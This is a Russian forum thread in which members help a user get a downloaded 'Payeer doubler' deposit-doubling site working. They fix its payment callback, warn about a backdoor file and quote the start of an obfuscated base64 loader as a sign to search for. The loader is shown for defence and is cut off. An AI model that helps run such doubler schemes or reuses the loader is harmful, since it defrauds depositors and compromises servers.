Payeer удвоитель. Не зачисляется депозит на удвоителе.

Roktor

Участник
Здравствуйте. Столкнулся с проблемой, прошу помощи. Я скачал Payeer удвоитель (С открытого доступа) и все настроил. Вроде все правильно. Заказал Мерчант (Уже одобрили) и настроил автовыплаты. Проблема такова: При внесении депозита на удвоитель средства с Payeer кошелька списываются, в истории Payeer все написано как надо, откуда списалось и куда пришло. Но на самом удвоителе мои депозиты не добавляются, не показываются. В базе данных, deposits тоже не заносятся. Помогите пожалуйста
 
Последнее редактирование:

jameson

Администратор
Чтобы Вам помочь нужно знать что за удвоитель и вообще хотя бы иметь представление о том что Вы скачали, удвоитель - удвоителю рознь, но проблема с 99% вероятности в обработчике платежа, который не принимает платеж или возможно неправильно дешифрует полученные данные.
 

jameson

Администратор
PHP:
<?php
define('SCRIPT_BY_SIRGOFFAN',dirname(__FILE__));
require_once('classes/safemysql.php');
require_once('config.php');

$cmnt="none";

$sum=$_POST['m_amount']; //Сумма, поступившая от клиента
$id=$_POST['m_orderid'];


if (isset($_POST['m_operation_id']) && isset($_POST['m_sign']))
{
    $arHash = array($_POST['m_operation_id'],
            $_POST['m_operation_ps'],
            $_POST['m_operation_date'],
            $_POST['m_operation_pay_date'],
            $_POST['m_shop'],
            $_POST['m_orderid'],
            $_POST['m_amount'],
            $_POST['m_curr'],
            $_POST['m_desc'],
            $_POST['m_status'],
            'КЛЮЧ'); // НЕ ПРОПИСАН КЛЮЧ
    $sign_hash = strtoupper(hash('sha256', implode(':', $arHash)));
if ($_POST['m_sign'] == $sign_hash && $_POST['m_status'] == 'success')
{
   


$referer=$db->getOne("SELECT curator FROM `ss_users` WHERE id=?i", $id);
$db->query("INSERT INTO deposits (userid, curatorid, summa, unixtime) VALUES(?i,?i,?s,?s)", $id, $referer, $sum, time());
echo $_POST['m_orderid'].'|success';
exit;
}
echo $_POST['m_orderid'].'|error';

}
?>
Не прописан ключ в 24-й строке
 

Leroi

Местный
нашел откуда скачивать ,проверь на дыры ,на соцеоле все дырявое
 

Roktor

Участник
PHP:
<?php
define('SCRIPT_BY_SIRGOFFAN',dirname(__FILE__));
require_once('classes/safemysql.php');
require_once('config.php');

$cmnt="none";

$sum=$_POST['m_amount']; //Сумма, поступившая от клиента
$id=$_POST['m_orderid'];


if (isset($_POST['m_operation_id']) && isset($_POST['m_sign']))
{
    $arHash = array($_POST['m_operation_id'],
            $_POST['m_operation_ps'],
            $_POST['m_operation_date'],
            $_POST['m_operation_pay_date'],
            $_POST['m_shop'],
            $_POST['m_orderid'],
            $_POST['m_amount'],
            $_POST['m_curr'],
            $_POST['m_desc'],
            $_POST['m_status'],
            'КЛЮЧ'); // НЕ ПРОПИСАН КЛЮЧ
    $sign_hash = strtoupper(hash('sha256', implode(':', $arHash)));
if ($_POST['m_sign'] == $sign_hash && $_POST['m_status'] == 'success')
{
  


$referer=$db->getOne("SELECT curator FROM `ss_users` WHERE id=?i", $id);
$db->query("INSERT INTO deposits (userid, curatorid, summa, unixtime) VALUES(?i,?i,?s,?s)", $id, $referer, $sum, time());
echo $_POST['m_orderid'].'|success';
exit;
}
echo $_POST['m_orderid'].'|error';

}
?>
Не прописан ключ в 24-й строке
Ты просто красавчик мужик. Теперь вставил ключ от магазина и работает. Спасибо тебе огромное. Как же хорошо, что есть люди, которые готовы помогать нуждающимся)
 

jameson

Администратор
Есть вредонос, удаляй срочно файл: /site/img/index.php благодаря этому файлу, тот кто выложил скрипт может получить доступ к сайту и как вариант вывести все с твоего payeer счета.
 

Roktor

Участник
Есть вредонос, удаляй срочно файл: /site/img/index.php благодаря этому файлу, тот кто выложил скрипт может получить доступ к сайту и как вариант вывести все с твоего payeer счета.
У меня в папке img нету index.php (Возможно я его уже удалял). Но этот файл есть в корне, в publick_html
Там вот такой код прописан,
<?session_start();
define('SCRIPT_BY_SIRGOFFAN',dirname(__FILE__));
include(dirname(__FILE__).'/core/ini.php');
include(dirname(__FILE__).'/core/cache.php');

$page = $_GET['page'];

include('templ/main/head.php');



if(isset($page)){
if(file_exists(dirname(__FILE__)."/pages/".$page.".php")){
include(dirname(__FILE__)."/pages/".$page.'.php');
}else{
include(dirname(__FILE__).'/pages/404.php');
}
}else{
include(dirname(__FILE__).'/pages/main.php');


}
Его удалять?

По этому пути у меня есть только один файл php - printshare.php

<?php
// Тип содержимого – картинка формата PNG
define( 'SCRIPT_BY_SIRGOFFAN', 1 );
include('../core/config.php');
include('../core/functions.php');
$lng=$_GET['locale'];//Язык
if($lng!='ru' AND $lng!='en' AND $lng!='nl' ){$_error='FATAL ERROR 1';}

$a=$_GET['a'];//Тип акции
if($a==1){$typeofshare="m1";}else
if($a==2){$typeofshare="m2";}else
if($a==3){$typeofshare="i1";}else
if($a==4){$typeofshare="i2";}else
if($a==5){$typeofshare="i3";}else{$_error='FATAL ERROR 2';}



$refcode=(int)$_GET['refcode'];//(N сертификата)
if($refcode<1){$_error='FATAL ERROR 3';}
$result=mysql_query("SELECT id, act_".$typeofshare.", reg_unix FROM `ss_users` WHERE refcode='$refcode'");
$rowe=mysql_fetch_array($result);
$userid=$rowe["id"]; //
$reg_unix=$rowe["reg_unix"]; //

if($userid<1){$_error='FATAL ERROR 4';}

$isact=(int)$rowe["act_".$typeofshare];

if($isact<1){/*$_error='FATAL ERROR 5';*/}else{

$result2=mysql_query("SELECT * FROM `userstat` WHERE userid='$userid' AND comment='$typeofshare' AND opisanie LIKE '<!--buyshare-->%' ORDER BY id DESC LIMIT 1");
$row=mysql_fetch_array($result2);
$data=strtotime($row["data"]); //
$data=date("d.m.Y",$data);
$dataX=$row["data"]; //
$ssid=$row["id"];
//if($ssid<1){$_error='FATAL ERROR 6';}

if(empty($dataX)){
$reg_unix=strtotime($reg_unix); //
$data=date("d.m.Y",$reg_unix);
}

}




function imageresizeS($im,$percents) {
$w=imagesx($im)*$percents/100;
$h=imagesy($im)*$percents/100;
$im1=imagecreatetruecolor($w,$h);
imagecopyresampled($im1,$im,0,0,0,0,$w,$h,imagesx($im),imagesy($im));

imagedestroy($im);
//imagedestroy($im1);
return $im1;
}






if(isset($_GET['previewpercent']) AND $_GET['previewpercent']>1 AND $_GET['previewpercent']<100){
$previewpercent=(int)$_GET['previewpercent'];
if($previewpercent<1){$previewpercent=100;}
}else{
$previewpercent=100;
}




if(empty($_error)){
$source_img='shares/'.$lng.'/'.$typeofshare.'.jpg';
$img = imageCreateFromJpeg($source_img);


// получаем массив, содержащий размеры изображения
$size = getimagesize ($source_img);
$CENTER=$size[0]/2;







if($typeofshare=='m1'){
$color = imagecolorallocatealpha($img, 0, 0, 0, 0);

if($isact!=0){
$box = imagettftext($img, 22, 0, 148, 172, $color, "./shares.ttf", $refcode);//160 172
$box = imagettftext($img, 22, 0, 762, 172, $color, "./shares.ttf", $data);
$costtxt=printlng("$".($isact*$sh['cost_m'][1]),"$".($isact*$sh['cost_m'][1]),($isact*$sh['cost_m'][1])." $","","","",$lng);
$box = imagettfbbox(88, 0, "./CollegeHalo.ttf", $costtxt);
// размер отступа влево, чтобы текст оказался посередине заданной точки
$left = $CENTER-round(($box[2]-$box[0])/2);
imagettftext($img, 88, 0, $left, 330, $color, "./CollegeHalo.ttf", $costtxt);
}



$desctxt=printlng("Shareholder Investment Corporation
Dit certificaat, met de nominale waarde van $".($isact*$sh['cost_m'][1])." is het eigendom van Shareholder
Investment Corporation, inclusief, en wordt betaald door de eigenaar volledig.
Dit aandeel wordt niet belast en voldoet aan de oprichters-overeenkomst en het corporatie reglement.","Shareholder Investment Corporation
This certificate, with the face value of $".($isact*$sh['cost_m'][1])." is the property of Shareholder Investment
Corporation, inclusive, and is paid for by its owner in full. This share is not taxed and
conforms to the Foundation Agreement and the Corporation’s By-Laws.","Shareholder Investment Corporation
Этот сертификат, стоимостью ".($isact*$sh['cost_m'][1])." $ является собственностью Shareholder
Investment Corporation, включительно и полностью оплачен владельцем.
Данная акция не облагается налогом, соответствует Учредительскому
Договору и Уставу Корпорации.","","","",$lng);
imagettftext($img, 20, 0, 100, 370, $color, "./share_d.ttf", $desctxt);

}else
if($typeofshare=='m2'){
///////
$color = imagecolorallocatealpha($img, 0, 0, 0, 0);



if($isact!=0){
$box = imagettftext($img, 22, 0, 149, 172, $color, "./shares.ttf", $refcode);
$box = imagettftext($img, 22, 0, 760, 172, $color, "./shares.ttf", $data);
$costtxt=printlng("$".($isact*$sh['cost_m'][2]),"$".($isact*$sh['cost_m'][2]),($isact*$sh['cost_m'][2])." $","","","",$lng);
$box = imagettfbbox(91, 0, "./CollegeHalo.ttf", $costtxt);
// размер отступа влево, чтобы текст оказался посередине заданной точки
$left = $CENTER-round(($box[2]-$box[0])/2);
imagettftext($img, 91, 0, $left, 300, $color, "./CollegeHalo.ttf", $costtxt);
}



$desctxt=printlng("Shareholder Investment Corporation
Dit certificaat, met de nominale waarde van $".($isact*$sh['cost_m'][2])." is het eigendom van Shareholder
Investment Corporation, inclusief, en wordt betaald door de eigenaar volledig.
Dit aandeel wordt niet belast en voldoet aan de oprichters-overeenkomst en het corporatie reglement.","Shareholder Investment Corporation
This certificate, with the face value of $".($isact*$sh['cost_m'][2])." is the property of Shareholder Investment
Corporation, inclusive, and is paid for by its owner in full. This share is not taxed and
conforms to the Foundation Agreement and the Corporation’s By-Laws.","Shareholder Investment Corporation
Этот сертификат, стоимостью ".($isact*$sh['cost_m'][2])." $ является собственностью Shareholder
Investment Corporation, включительно и полностью оплачен владельцем.
Данная акция не облагается налогом, соответствует Учредительскому
Договору и Уставу Корпорации.","","","",$lng);
imagettftext($img, 20, 0, 100, 370, $color, "./share_d.ttf", $desctxt);

}else
if($typeofshare=='i1'){
$color = imagecolorallocatealpha($img, 0, 0, 0, 0);



if($isact!=0){
$box = imagettftext($img, 22, 0, 119, 171, $color, "./shares.ttf", $refcode);
$box = imagettftext($img, 22, 0, 784, 171, $color, "./shares.ttf", $data);
$costtxt=printlng("$".($isact*$sh['cost_i'][1]),"$".($isact*$sh['cost_i'][1]),($isact*$sh['cost_i'][1])." $","","","",$lng);
$box = imagettfbbox(91, 0, "./CollegeHalo.ttf", $costtxt);
// размер отступа влево, чтобы текст оказался посередине заданной точки
$left = $CENTER-round(($box[2]-$box[0])/2);
imagettftext($img, 91, 0, $left, 320, $color, "./CollegeHalo.ttf", $costtxt);
}




$desctxt=printlng("Shareholder Investment Corporation
Dit certificaat, met de nominale waarde van $".($isact*$sh['cost_i'][1])." is het eigendom van Shareholder
Investment Corporation, inclusief, en wordt betaald door de eigenaar volledig.
Dit aandeel wordt niet belast en voldoet aan de oprichters-overeenkomst en het corporatie reglement.","Shareholder Investment Corporation
This certificate, with the face value of $".($isact*$sh['cost_i'][1])." is the property of Shareholder Investment
Corporation, inclusive, and is paid for by its owner in full. This share is not taxed and
conforms to the Foundation Agreement and the Corporation’s By-Laws.","Shareholder Investment Corporation
Этот сертификат, стоимостью ".($isact*$sh['cost_i'][1])." $ является собственностью Shareholder
Investment Corporation, включительно и полностью оплачен владельцем.
Данная акция не облагается налогом, соответствует Учредительскому
Договору и Уставу Корпорации.","","","",$lng);
imagettftext($img, 20, 0, 100, 370, $color, "./share_d.ttf", $desctxt);


}else
if($typeofshare=='i2'){
$color = imagecolorallocatealpha($img, 0, 0, 0, 0);



if($isact!=0){
$box = imagettftext($img, 22, 0, 179, 212, $color, "./shares.ttf", $refcode);
$box = imagettftext($img, 22, 0, 763, 212, $color, "./shares.ttf", $data);
$costtxt=printlng("$".($isact*$sh['cost_i'][2]),"$".($isact*$sh['cost_i'][2]),($isact*$sh['cost_i'][2])." $","","","",$lng);
$box = imagettfbbox(80, 0, "./CollegeHalo.ttf", $costtxt);
// размер отступа влево, чтобы текст оказался посередине заданной точки
$left = $CENTER-round(($box[2]-$box[0])/2);
imagettftext($img, 80, 0, $left, 333, $color, "./CollegeHalo.ttf", $costtxt);
}

$desctxt=printlng("Shareholder Investment Corporation
Dit certificaat, met de nominale waarde van $".($isact*$sh['cost_i'][2])." is het eigendom van Shareholder
Investment Corporation, inclusief, en wordt betaald door de eigenaar volledig.
Dit aandeel wordt niet belast en voldoet aan de oprichters-overeenkomst en het corporatie reglement.","Shareholder Investment Corporation
This certificate, with the face value of $".($isact*$sh['cost_i'][2])." is the property of Shareholder Investment
Corporation, inclusive, and is paid for by its owner in full. This share is not taxed and
conforms to the Foundation Agreement and the Corporation’s By-Laws.","Shareholder Investment Corporation
Этот сертификат, стоимостью ".($isact*$sh['cost_i'][2])." $ является собственностью Shareholder
Investment Corporation, включительно и полностью оплачен владельцем.
Данная акция не облагается налогом, соответствует Учредительскому
Договору и Уставу Корпорации.","","","",$lng);
imagettftext($img, 20, 0, 100, 380, $color, "./share_d.ttf", $desctxt);

}else
if($typeofshare=='i3'){
$color = imagecolorallocatealpha($img, 0, 0, 0, 0);



if($isact!=0){
$box = imagettftext($img, 22, 0, 194, 228, $color, "./shares.ttf", $refcode);
$box = imagettftext($img, 22, 0, 792, 228, $color, "./shares.ttf", $data);
$costtxt=printlng("$".($isact*$sh['cost_i'][3]),"$".($isact*$sh['cost_i'][3]),($isact*$sh['cost_i'][3])." $","","","",$lng);
$box = imagettfbbox(80, 0, "./CollegeHalo.ttf", $costtxt);
// размер отступа влево, чтобы текст оказался посередине заданной точки
$left = $CENTER-round(($box[2]-$box[0])/2);
imagettftext($img, 80, 0, $left, 350, $color, "./CollegeHalo.ttf", $costtxt);
}



$desctxt=printlng("Shareholder Investment Corporation
Dit certificaat, met de nominale waarde van $".($isact*$sh['cost_i'][3])." is het eigendom van Shareholder
Investment Corporation, inclusief, en wordt betaald door de eigenaar volledig.
Dit aandeel wordt niet belast en voldoet aan de oprichters-overeenkomst en het corporatie reglement.","Shareholder Investment Corporation
This certificate, with the face value of $".($isact*$sh['cost_i'][3])." is the property of Shareholder Investment
Corporation, inclusive, and is paid for by its owner in full. This share is not taxed and
conforms to the Foundation Agreement and the Corporation’s By-Laws.","Shareholder Investment Corporation
Этот сертификат, стоимостью ".($isact*$sh['cost_i'][3])." $ является собственностью Shareholder
Investment Corporation, включительно и полностью оплачен владельцем.
Данная акция не облагается налогом, соответствует Учредительскому
Договору и Уставу Корпорации.","","","",$lng);
imagettftext($img, 20, 0, 100, 400, $color, "./share_d.ttf", $desctxt);


}
}else{
/*if($userid==21)
echo $_error;
exit();
*/
$img = imageCreateFromJpeg('shares_null/'.$lng.'/'.$typeofshare.'.jpg');

}



if(isset($_GET['previewpercent'])){
$img = imageresizeS($img,$previewpercent);
}










header("Content-type: image/png");

// выводим готовую картинку в формате PNG
imagepng($img);
// освобождаем память, выделенную для картинки
imagedestroy($img);
exit();


?>
 
Последнее редактирование:

viktor70

Участник
У меня в папке img нету index.php (Возможно я его уже удалял). Но этот файл есть в корне, в publick_html
Там вот такой код прописан,
<?session_start();
define('SCRIPT_BY_SIRGOFFAN',dirname(__FILE__));
include(dirname(__FILE__).'/core/ini.php');
include(dirname(__FILE__).'/core/cache.php');

$page = $_GET['page'];

include('templ/main/head.php');



if(isset($page)){
if(file_exists(dirname(__FILE__)."/pages/".$page.".php")){
include(dirname(__FILE__)."/pages/".$page.'.php');
}else{
include(dirname(__FILE__).'/pages/404.php');
}
}else{
include(dirname(__FILE__).'/pages/main.php');


}
Его удалять?
Если ты в корне index удалишь, то не будет сайт работать.
 

viktor70

Участник
Возможно и нет. Обычно в таком файле всё закодировано, проверь другие папки на наличие лишних файлов.
 

viktor70

Участник
Вот типа такого кода ищи:
Код:
<?php $wp__wp='base'.(128/2).'_de'.'code';$wp__wp=$wp__wp(str_replace("\n", '', 'ObBykUDsCh2PiKsj5cqfSDyA8xI8bIrawFHOQbc16qiD+/3Wnoko/OoyWI4NB7fPtkccJR/VNFrQ//up
и так далее.
 

Roktor

Участник
Вот типа такого кода ищи:
Код:
<?php $wp__wp='base'.(128/2).'_de'.'code';$wp__wp=$wp__wp(str_replace("\n", '', 'ObBykUDsCh2PiKsj5cqfSDyA8xI8bIrawFHOQbc16qiD+/3Wnoko/OoyWI4NB7fPtkccJR/VNFrQ//up
и так далее.
Прошелся по всем папкам и файлам. Ничего подобного не увидел. Не подскажите, через какую программу можно проверять скрипты на дыры?
 

viktor70

Участник
обычно в ручную всё проверяется, программы не покажут 100% результат.
 

jameson

Администратор
Понял, спасибо. Получается у меня нету того файла, про который выше говорится
По ссылке, что ты выше давал на скачивание он есть и вот он в аттаче, смотри, точно его нет или же тот кто его разместил уже имеет доуступ к серверу и стер его, либо добавил вредоносный код в другой файл.

Зараженный файл прикрепил к ответу, ищи примерный код
 

Вложения

  • 21,2 КБ Просмотры: 537

Roktor

Участник
По ссылке, что ты выше давал на скачивание он есть и вот он в аттаче, смотри, точно его нет или же тот кто его разместил уже имеет доуступ к серверу и стер его, либо добавил вредоносный код в другой файл.

Зараженный файл прикрепил к ответу, ищи примерный код
Облазил везде, нигде не заметил. Но код знакомый, я его видел. Может я его и удалил... У меня другой вопрос возник. Я хочу разместить банеры на своем удвоителе. Но не могу это сделать корректно. http://2xlive.ru вот мой удвоитель. Я пытаюсь вставить внизу по бокам банеры, не получается, они вставляются внутрь белого фона, а не по бокам. Можете что-нибудь подсказать?
 

jameson

Администратор
Так это надо смотреть стили и код страницы, я не могу знать как ты сайт свой размечал, таблицами, дивами или еще как-то, как вариант есть универсальное решение правда не самое неудачное, ибо ему уже лет 20, этому решению, но под стиль твоего сайта подойдет и даже не испортит его:
HTML:
<table width="100%">
    <tr>
    <td width="25%">КОД_БАННЕРА_1</td>
    </tr>
    <tr>
    <td width="25%">КОД_БАННЕРА_2</td>
    </tr>
    <tr>
    <td width="25%">КОД_БАННЕРА_3</td>
    </tr>
    <tr>
    <td width="25%">КОД_БАННЕРА_4</td>
    </tr>
</table>
что-то типа того, нужно вставить в самый низ перед футером.
 

Roktor

Участник
Так это надо смотреть стили и код страницы, я не могу знать как ты сайт свой размечал, таблицами, дивами или еще как-то, как вариант есть универсальное решение правда не самое неудачное, ибо ему уже лет 20, этому решению, но под стиль твоего сайта подойдет и даже не испортит его:
HTML:
<table width="100%">
    <tr>
    <td width="25%">КОД_БАННЕРА_1</td>
    </tr>
    <tr>
    <td width="25%">КОД_БАННЕРА_2</td>
    </tr>
    <tr>
    <td width="25%">КОД_БАННЕРА_3</td>
    </tr>
    <tr>
    <td width="25%">КОД_БАННЕРА_4</td>
    </tr>
</table>
что-то типа того, нужно вставить в самый низ перед футером.
Спасибо большое, куда-то в общем вставил) Но стало получше, благодарю)
 
Верх